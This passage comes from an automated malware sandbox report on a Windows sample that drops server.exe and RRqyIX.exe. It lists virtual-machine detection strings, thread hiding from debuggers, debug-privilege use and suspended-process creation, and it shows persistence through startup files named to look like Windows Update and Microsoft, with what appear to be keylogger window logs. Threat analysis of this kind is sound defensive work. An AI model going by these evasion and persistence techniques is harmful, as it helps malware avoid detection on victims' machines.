Source: Amcache.hve.1.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.1.dr Binary or memory string: VMware-42 27 80 4d 99 30 0e 9c-c1 9b 2a 23 ea 1f c4 20
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.1.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: server.exe, 00000004.00000002.4625843367.0000000000F2D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW(
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: ,Windows 2016 Server Standard without Hyper-V
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V (core)
Source: Amcache.hve.1.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (full)
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (full)
Source: server.exe, 00000004.00000002.4625843367.0000000000F2D000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000005.00000003.2217703436.0000000002B91000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Microsoft Corporation.exe, 00000015.00000002.2623125899.0000000000A27000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: VBoxService.exe
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V
Source: RRqyIX.exe, 00000016.00000002.2612085202.0000000000A85000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp, server.exe, 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmp, 8d9ba8e0d68a3d306883c186c2013957Windows Update.exe, 0000000E.00000002.2357048192.0000000000AA7000.00000040.00000001.01000000.0000000B.sdmp, Microsoft Corporation.exe, 00000015.00000002.2623125899.0000000000A27000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: Hyper-VU
Source: Amcache.hve.1.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: *Windows 10 Server Standard without Hyper-V
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 1Windows 10 Server Standard without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (full)
Source: Microsoft Corporation.exe, 00000015.00000002.2623125899.0000000000A27000.00000040.00000001.01000000.0000000C.sdmp Binary or memory string: VMWare
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (full)
Source: Amcache.hve.1.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 0000000F.00000003.2358915133.0000000000AE6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWH
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (core)
Source: RRqyIX.exe, 00000001.00000002.2244767719.000000000063E000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 00000001.00000003.2166751955.0000000000657000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 0000000F.00000002.2527978359.0000000000AB1000.00000004.00000020.00020000.00000000.sdmp, RRqyIX.exe, 0000000F.00000003.2358915133.0000000000ABC000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWL
Source: LisectAVT_2403002B_366.exe, LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (full)
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 2Windows 8.1 Server Standard without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (full)
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (core)
Source: LisectAVT_2403002B_366.exe, 00000000.00000002.2189110013.000000000061C000.00000040.00000001.01000000.00000003.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (full)
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe API call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\Temp\server.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\8d9ba8e0d68a3d306883c186c2013957Windows Update.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Microsoft Corporation.exe Thread information set: HideFromDebugger
Enables debug privileges
Source: C:\Users\user\AppData\Local\Temp\server.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Memory allocated: page read and write | page guard Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\LisectAVT_2403002B_366.exe Process created: C:\Users\user\AppData\Local\Temp\server.exe "C:\Users\user\AppData\Local\Temp\server.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\24de2542.bat" "
Source: C:\Users\user\AppData\Local\Temp\RRqyIX.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\2266597f.bat" "
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/27 | 21:15:31 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 08:32:54 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 01:40:53 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 16:03:46 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 09:20:33 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 05:45:48 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/25 | 16:17:15 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 13:38:10 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 10:40:33 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 17:50:48 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 15:41:22 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 07:44:28 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 15:42:21 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 17:24:06 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 12:26:03 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 03:47:47 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 08:30:09 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 08:03:15 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 09:41:57 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 03:27:22 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 15:01:25 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/07/27 | 17:28:18 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/19 | 22:54:38 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 07:30:00 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/25 | 12:19:55 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 07:39:57 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 07:27:13 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 21:54:41 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 14:12:34 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 03:44:10 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 13:32:16 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 21:22:05 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 15:19:16 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 06:59:08 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/25 | 14:56:34 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/28 | 00:01:00 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 17:57:07 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/27 | 20:04:30 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 07:13:58 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 16:39:13 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/25 | 14:30:46 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 11:20:51 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 06:00:26 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 07:20:41 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 23:57:59 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 12:10:57 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 04:20:50 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 07:12:28 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 14:59:46 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 06:53:30 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/27 | 23:32:07 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 03:32:40 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 02:06:59 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/23 | 01:42:20 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 17:33:51 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/25 | 16:25:07 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 08:00:07 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 17:55:32 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 15:18:33 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 10:16:49 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 21:25:02 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 00:27:20 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 14:05:54 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 22:22:48 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 22:10:04 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/27 | 23:40:22 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/19 | 22:56:36 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 11:15:33 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 03:33:36 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/25 | 14:25:28 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 05:18:38 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/15 | 00:57:04 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 18:12:16 - Program Manager
Source: server.exe, 00000004.00000002.4628547568.0000000003F9E000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/14 | 15:51:57 - Program Manager
Source: server.exe, 00000004.00000002.4631520747.00000000050F3000.00000004.00000800.00020000.00000000.sdmp, server.exe, 00000004.00000002.4631520747.0000000004F50000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: 24/08/22 | 18:26:16 - Program Manager
